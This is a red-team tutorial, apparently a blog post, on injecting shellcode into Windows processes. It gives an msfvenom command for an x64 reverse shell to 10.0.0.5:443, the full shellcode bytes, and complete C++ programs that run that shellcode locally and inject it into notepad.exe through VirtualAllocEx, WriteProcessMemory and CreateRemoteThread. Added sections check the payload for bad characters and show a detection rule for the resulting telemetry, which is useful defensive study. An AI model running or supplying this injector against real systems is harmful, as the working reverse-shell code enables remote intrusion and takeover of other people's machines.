Author: Ovpirit_Three (member of the Ms08067 red team)
Injecting shellcode into a local process
This write-up walks through some classic ways of injecting shellcode into process memory and executing it, first in the injecting program's own process and then in a remote process.
1. Executing shellcode in a local process
A simple test of how to execute shellcode directly from a C++ program.
Generate the shellcode for a reverse shell (x64, connecting back to 10.0.0.5:443, with the NUL, LF and CR bytes excluded as bad characters):
The command is as follows:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c -b '\x00\x0a\x0d'
C++ code that embeds the shellcode, copies it into an executable buffer and calls it:
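The `-f c` output above is a C string literal built from `\xHH` escapes, and `-b` asks the encoder to avoid the listed bytes. The following is an added example, not code from the original post: a small C routine that decodes that textual form back into raw bytes and verifies that none of the bad characters survived, which is worth doing before the payload goes anywhere near a `strcpy`-style sink. The sample texts are constructed for the demo (the first reuses the opening bytes of the post's payload in msfvenom's exact layout) and are not the full shellcode.

```c
/*
 * Added example (not from the original post): decode the "-f c" text that
 * msfvenom prints into raw bytes and confirm that none of the characters
 * passed to -b (here \x00, \x0a, \x0d) survived the encoder. The sample
 * texts below are constructed for the demo, not the post's real shellcode.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode every \xHH escape in `text` into `out`; quotes, the variable
 * header, ';' and whitespace are skipped. Returns the number of bytes
 * written, or 0 on a malformed escape or when `cap` is exceeded. */
size_t decode_c_escapes(const char *text, unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (const char *p = text; *p; p++) {
        if (*p != '\\')
            continue;                   /* not an escape: quote, newline, ... */
        if (p[1] != 'x' || hexval(p[2]) < 0 || hexval(p[3]) < 0)
            return 0;                   /* only \xHH is expected in -f c output */
        if (n == cap)
            return 0;
        out[n++] = (unsigned char)(hexval(p[2]) * 16 + hexval(p[3]));
        p += 3;
    }
    return n;
}

/* Return the index of the first byte of `buf` that appears in `bad`, or -1. */
long first_badchar(const unsigned char *buf, size_t n,
                   const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}

/* Constructed sample: the first 15 bytes of the post's x64 payload, in the
 * layout msfvenom -f c prints (variable header, quoted lines, ';'). */
static const char SAMPLE_OK[] =
    "unsigned char buf[] = \n"
    "\"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xc6\\xff\\xff\\xff\"\n"
    "\"\\x48\\x8d\\x05\\xef\\xff\";\n";

/* Constructed sample that smuggles a NUL and a CR in: must be rejected. */
static const char SAMPLE_BAD[] = "\"\\x48\\x31\\x00\\x0d\"";

/* The bytes handed to -b in the command above. */
static const unsigned char BADCHARS[] = { 0x00, 0x0a, 0x0d };

/* Decode and check in one step; returns the byte count on success, -1 if
 * the text is malformed, or -(2+index) if a bad char sits at `index`. */
long check_payload(const char *text)
{
    unsigned char buf[4096];
    size_t n = decode_c_escapes(text, buf, sizeof buf);
    if (n == 0)
        return -1;
    long bad = first_badchar(buf, n, BADCHARS, sizeof BADCHARS);
    return bad < 0 ? (long)n : -(2 + bad);
}

int main(void)
{
    printf("ok sample:  %ld\n", check_payload(SAMPLE_OK));   /* 15 */
    printf("bad sample: %ld\n", check_payload(SAMPLE_BAD));  /* -4 */
    return 0;
}
```

Note that when the literal is compiled straight into a program, as the post does, the compiler performs this decoding itself and appends a terminating NUL, which is why `sizeof(shellcode)` is one byte larger than the payload; copying that extra byte is harmless, but it is not part of the shellcode.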
inject-local-process.cpp
#include "stdafx.h"   // Visual Studio precompiled header; remove if the project has none
#include "Windows.h"
#include <string.h>

int main()
{
    // msfvenom output: windows/x64/shell_reverse_tcp to 10.0.0.5:443, bad chars \x00\x0a\x0d excluded
    unsigned char shellcode[] =
    "\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
    "\xff\xff\x48\xbb\x1d\xbe\xa2\x7b\x2b\x90\xe1\xec\x48\x31\x58"
    "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xe1\xf6\x21\x9f\xdb\x78"
    "\x21\xec\x1d\xbe\xe3\x2a\x6a\xc0\xb3\xbd\x4b\xf6\x93\xa9\x4e"
    "\xd8\x6a\xbe\x7d\xf6\x29\x29\x33\xd8\x6a\xbe\x3d\xf6\x29\x09"
    "\x7b\xd8\xee\x5b\x57\xf4\xef\x4a\xe2\xd8\xd0\x2c\xb1\x82\xc3"
    "\x07\x29\xbc\xc1\xad\xdc\x77\xaf\x3a\x2a\x51\x03\x01\x4f\xff"
    "\xf3\x33\xa0\xc2\xc1\x67\x5f\x82\xea\x7a\xfb\x1b\x61\x64\x1d"
    "\xbe\xa2\x33\xae\x50\x95\x8b\x55\xbf\x72\x2b\xa0\xd8\xf9\xa8"
    "\x96\xfe\x82\x32\x2a\x40\x02\xba\x55\x41\x6b\x3a\xa0\xa4\x69"
    "\xa4\x1c\x68\xef\x4a\xe2\xd8\xd0\x2c\xb1\xff\x63\xb2\x26\xd1"
    "\xe0\x2d\x25\x5e\xd7\x8a\x67\x93\xad\xc8\x15\xfb\x9b\xaa\x5e"
    "\x48\xb9\xa8\x96\xfe\x86\x32\x2a\x40\x87\xad\x96\xb2\xea\x3f"
    "\xa0\xd0\xfd\xa5\x1c\x6e\xe3\xf0\x2f\x18\xa9\xed\xcd\xff\xfa"
    "\x3a\x73\xce\xb8\xb6\x5c\xe6\xe3\x22\x6a\xca\xa9\x6f\xf1\x9e"
    "\xe3\x29\xd4\x70\xb9\xad\x44\xe4\xea\xf0\x39\x79\xb6\x13\xe2"
    "\x41\xff\x32\x95\xe7\x92\xde\x42\x8d\x90\x7b\x2b\xd1\xb7\xa5"
    "\x94\x58\xea\xfa\xc7\x30\xe0\xec\x1d\xf7\x2b\x9e\x62\x2c\xe3"
    "\xec\x1c\x05\xa8\x7b\x2b\x95\xa0\xb8\x54\x37\x46\x37\xa2\x61"
    "\xa0\x56\x51\xc9\x84\x7c\xd4\x45\xad\x65\xf7\xd6\xa3\x7a\x2b"
    "\x90\xb8\xad\xa7\x97\x22\x10\x2b\x6f\x34\xbc\x4d\xf3\x93\xb2"
    "\x66\xa1\x21\xa4\xe2\x7e\xea\xf2\xe9\xd8\x1e\x2c\x55\x37\x63"
    "\x3a\x91\x7a\xee\x33\xfd\x41\x77\x33\xa2\x57\x8b\xfc\x5c\xe6"
    "\xee\xf2\xc9\xd8\x68\x15\x5c\x04\x3b\xde\x5f\xf1\x1e\x39\x55"
    "\x3f\x66\x3b\x29\x90\xe1\xa5\xa5\xdd\xcf\x1f\x2b\x90\xe1\xec"
    "\x1d\xff\xf2\x3a\x7b\xd8\x68\x0e\x4a\xe9\xf5\x36\x1a\x50\x8b"
    "\xe1\x44\xff\xf2\x99\xd7\xf6\x26\xa8\x39\xea\xa3\x7a\x63\x1d"
    "\xa5\xc8\x05\x78\xa2\x13\x63\x19\x07\xba\x4d\xff\xf2\x3a\x7b"
    "\xd1\xb1\xa5\xe2\x7e\xe3\x2b\x62\x6f\x29\xa1\x94\x7f\xee\xf2"
    "\xea\xd1\x5b\x95\xd1\x81\x24\x84\xfe\xd8\xd0\x3e\x55\x41\x68"
    "\xf0\x25\xd1\x5b\xe4\x9a\xa3\xc2\x84\xfe\x2b\x11\x59\xbf\xe8"
    "\xe3\xc1\x8d\x05\x5c\x71\xe2\x6b\xea\xf8\xef\xb8\xdd\xea\x61"
    "\xb4\x22\x80\xcb\xe5\xe4\x57\x5a\xad\xd0\x14\x41\x90\xb8\xad"
    "\x94\x64\x5d\xae\x2b\x90\xe1\xec";

    // Allocate an RWX region in our own process, copy the shellcode into it,
    // then call the buffer as if it were a function with no arguments.
    void *exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL)
        return 1;
    memcpy(exec, shellcode, sizeof(shellcode));
    ((void(*)())exec)();
    return 0;
}
Before compiling, out of curiosity, let's look at the generated binary in a disassembler so we can get a rough idea of how the C++ code above translates into x64 machine code.
Also out of curiosity, it is worth seeing what the shellcode looks like inside the process and where it actually lives. Generating a 32-bit version of the payload (msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c -b '\x00\x0a\x0d') and running it under a debugger shows the shellcode bytes sitting neatly in the main thread's stack: `shellcode[]` is a local array, so the source copy lives on the stack, while the copy that actually runs is the one placed in the VirtualAlloc'd region.
Back to the x64 shellcode: compiling and running the binary gives us the expected reverse shell.
2. Executing shellcode in a remote process
The following code injects the same shellcode into a running notepad.exe whose PID is passed on the command line (5428 in this test); the injected thread then initiates a reverse shell back to the attacker at 10.0.0.5:443.
inject-remote-process.cpp
#include "stdafx.h"   // Visual Studio precompiled header; remove if the project has none
#include "Windows.h"
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    // msfvenom output: windows/x64/shell_reverse_tcp to 10.0.0.5:443, bad chars \x00\x0a\x0d excluded
    unsigned char shellcode[] =
    "\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
    "\xff\xff\x48\xbb\x1d\xbe\xa2\x7b\x2b\x90\xe1\xec\x48\x31\x58"
    "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xe1\xf6\x21\x9f\xdb\x78"
    "\x21\xec\x1d\xbe\xe3\x2a\x6a\xc0\xb3\xbd\x4b\xf6\x93\xa9\x4e"
    "\xd8\x6a\xbe\x7d\xf6\x29\x29\x33\xd8\x6a\xbe\x3d\xf6\x29\x09"
    "\x7b\xd8\xee\x5b\x57\xf4\xef\x4a\xe2\xd8\xd0\x2c\xb1\x82\xc3"
    "\x07\x29\xbc\xc1\xad\xdc\x77\xaf\x3a\x2a\x51\x03\x01\x4f\xff"
    "\xf3\x33\xa0\xc2\xc1\x67\x5f\x82\xea\x7a\xfb\x1b\x61\x64\x1d"
    "\xbe\xa2\x33\xae\x50\x95\x8b\x55\xbf\x72\x2b\xa0\xd8\xf9\xa8"
    "\x96\xfe\x82\x32\x2a\x40\x02\xba\x55\x41\x6b\x3a\xa0\xa4\x69"
    "\xa4\x1c\x68\xef\x4a\xe2\xd8\xd0\x2c\xb1\xff\x63\xb2\x26\xd1"
    "\xe0\x2d\x25\x5e\xd7\x8a\x67\x93\xad\xc8\x15\xfb\x9b\xaa\x5e"
    "\x48\xb9\xa8\x96\xfe\x86\x32\x2a\x40\x87\xad\x96\xb2\xea\x3f"
    "\xa0\xd0\xfd\xa5\x1c\x6e\xe3\xf0\x2f\x18\xa9\xed\xcd\xff\xfa"
    "\x3a\x73\xce\xb8\xb6\x5c\xe6\xe3\x22\x6a\xca\xa9\x6f\xf1\x9e"
    "\xe3\x29\xd4\x70\xb9\xad\x44\xe4\xea\xf0\x39\x79\xb6\x13\xe2"
    "\x41\xff\x32\x95\xe7\x92\xde\x42\x8d\x90\x7b\x2b\xd1\xb7\xa5"
    "\x94\x58\xea\xfa\xc7\x30\xe0\xec\x1d\xf7\x2b\x9e\x62\x2c\xe3"
    "\xec\x1c\x05\xa8\x7b\x2b\x95\xa0\xb8\x54\x37\x46\x37\xa2\x61"
    "\xa0\x56\x51\xc9\x84\x7c\xd4\x45\xad\x65\xf7\xd6\xa3\x7a\x2b"
    "\x90\xb8\xad\xa7\x97\x22\x10\x2b\x6f\x34\xbc\x4d\xf3\x93\xb2"
    "\x66\xa1\x21\xa4\xe2\x7e\xea\xf2\xe9\xd8\x1e\x2c\x55\x37\x63"
    "\x3a\x91\x7a\xee\x33\xfd\x41\x77\x33\xa2\x57\x8b\xfc\x5c\xe6"
    "\xee\xf2\xc9\xd8\x68\x15\x5c\x04\x3b\xde\x5f\xf1\x1e\x39\x55"
    "\x3f\x66\x3b\x29\x90\xe1\xa5\xa5\xdd\xcf\x1f\x2b\x90\xe1\xec"
    "\x1d\xff\xf2\x3a\x7b\xd8\x68\x0e\x4a\xe9\xf5\x36\x1a\x50\x8b"
    "\xe1\x44\xff\xf2\x99\xd7\xf6\x26\xa8\x39\xea\xa3\x7a\x63\x1d"
    "\xa5\xc8\x05\x78\xa2\x13\x63\x19\x07\xba\x4d\xff\xf2\x3a\x7b"
    "\xd1\xb1\xa5\xe2\x7e\xe3\x2b\x62\x6f\x29\xa1\x94\x7f\xee\xf2"
    "\xea\xd1\x5b\x95\xd1\x81\x24\x84\xfe\xd8\xd0\x3e\x55\x41\x68"
    "\xf0\x25\xd1\x5b\xe4\x9a\xa3\xc2\x84\xfe\x2b\x11\x59\xbf\xe8"
    "\xe3\xc1\x8d\x05\x5c\x71\xe2\x6b\xea\xf8\xef\xb8\xdd\xea\x61"
    "\xb4\x22\x80\xcb\xe5\xe4\x57\x5a\xad\xd0\x14\x41\x90\xb8\xad"
    "\x94\x64\x5d\xae\x2b\x90\xe1\xec";

    HANDLE processHandle;
    HANDLE remoteThread;
    PVOID remoteBuffer;

    if (argc < 2) {
        printf("usage: %s <pid>\n", argv[0]);
        return 1;
    }
    DWORD pid = (DWORD)atoi(argv[1]);
    printf("Injecting to PID: %lu\n", (unsigned long)pid);

    // 1. Open the target. PROCESS_ALL_ACCESS is more than needed; VM_OPERATION,
    //    VM_WRITE and CREATE_THREAD are the rights the next three calls require.
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (processHandle == NULL) {
        printf("OpenProcess failed: %lu\n", GetLastError());
        return 1;
    }
    // 2. Reserve and commit an RWX region inside the target.
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    // 3. Copy the shellcode bytes into that region.
    WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof(shellcode), NULL);
    // 4. Start a new thread in the target whose entry point is the buffer.
    remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    if (remoteThread != NULL)
        CloseHandle(remoteThread);
    CloseHandle(processHandle);
    return 0;
}
Before the shellcode is injected, notepad has no TCP connections at all.
Now, once the code is compiled and executed, a tool that monitors API calls shows notepad doing something it has no business doing: spawning cmd.exe and initiating a TCP connection.
Checking notepad again in Process Explorer shows an established TCP connection, with cmd.exe running as its child process.
Note also that notepad has loaded ws2_32.dll, the Winsock library that provides the socket API. Notepad never touches the network, so this module should not appear in its module list under normal circumstances; together with the unexpected child process and the outbound connection it is a strong indicator of injected code. The caveat is that many legitimate programs do load ws2_32.dll, so this kind of rule only works against a per-process baseline of what is normal.
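The three observations above (an unexpected child shell, an outbound connection, and a networking DLL in a process that never needs one) can be turned directly into a detection rule. The following is an added example, not code from the post: a small C routine that applies that rule to a constructed batch of Sysmon-style event records. The event layout, the "no-network" baseline list and the sample records are assumptions made for this demo; real telemetry would supply the same fields from an EDR or Sysmon's ProcessCreate, ImageLoad and NetworkConnect events.

```c
/*
 * Added example (not from the original post): the post's three indicators
 * as a detection rule over constructed, Sysmon-style event records.
 * Event layout, baseline list and sample events are assumptions for the demo.
 */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

typedef enum { EV_PROCESS_CREATE, EV_IMAGE_LOAD, EV_NETWORK_CONNECT } ev_type;

typedef struct {
    ev_type type;
    const char *image;   /* process that did the thing (file name only) */
    const char *detail;  /* child image, loaded DLL, or "dst:port" */
} event;

/* Processes that have no business doing any of the three things.
 * Assumed baseline; build yours from your own environment's normal behaviour. */
static const char *NO_NETWORK_IMAGES[] = { "notepad.exe", "calc.exe", "mspaint.exe" };

/* Case-insensitive equality: Windows image names arrive in mixed case. */
static int ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == *b;
}

static int in_baseline(const char *image)
{
    for (size_t i = 0; i < sizeof NO_NETWORK_IMAGES / sizeof *NO_NETWORK_IMAGES; i++)
        if (ieq(image, NO_NETWORK_IMAGES[i]))
            return 1;
    return 0;
}

/* Returns a reason string if the event is suspicious, else NULL. */
const char *classify(const event *e)
{
    if (!in_baseline(e->image))
        return NULL;                        /* browsers etc. legitimately do all of this */
    switch (e->type) {
    case EV_PROCESS_CREATE:
        if (ieq(e->detail, "cmd.exe") || ieq(e->detail, "powershell.exe"))
            return "baseline process spawned a shell";
        return NULL;
    case EV_IMAGE_LOAD:
        if (ieq(e->detail, "ws2_32.dll") || ieq(e->detail, "wininet.dll"))
            return "baseline process loaded a networking DLL";
        return NULL;
    case EV_NETWORK_CONNECT:
        return "baseline process opened a network connection";
    }
    return NULL;
}

/* Run the rule over a batch and return how many events were flagged. */
int scan(const event *evs, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) {
        const char *why = classify(&evs[i]);
        if (why) {
            hits++;
            printf("ALERT %s: %s (%s)\n", evs[i].image, why, evs[i].detail);
        }
    }
    return hits;
}

/* Constructed sample: what the post's injection looks like as telemetry,
 * interleaved with benign noise that must not fire. */
static const event SAMPLE[] = {
    { EV_IMAGE_LOAD,      "notepad.exe",  "kernel32.dll" },
    { EV_IMAGE_LOAD,      "chrome.exe",   "ws2_32.dll"   },  /* browsers do this */
    { EV_IMAGE_LOAD,      "notepad.exe",  "ws2_32.dll"   },
    { EV_NETWORK_CONNECT, "notepad.exe",  "10.0.0.5:443" },
    { EV_PROCESS_CREATE,  "notepad.exe",  "cmd.exe"      },
    { EV_PROCESS_CREATE,  "explorer.exe", "cmd.exe"      },  /* user opened a prompt */
};

int main(void)
{
    int hits = scan(SAMPLE, sizeof SAMPLE / sizeof *SAMPLE);
    printf("%d suspicious events\n", hits);   /* 3 */
    return 0;
}
```

The rule is deliberately keyed on a baseline of processes rather than on the DLL or the child alone: ws2_32.dll in chrome.exe or cmd.exe under explorer.exe is normal, and alerting on those would bury the notepad case in noise.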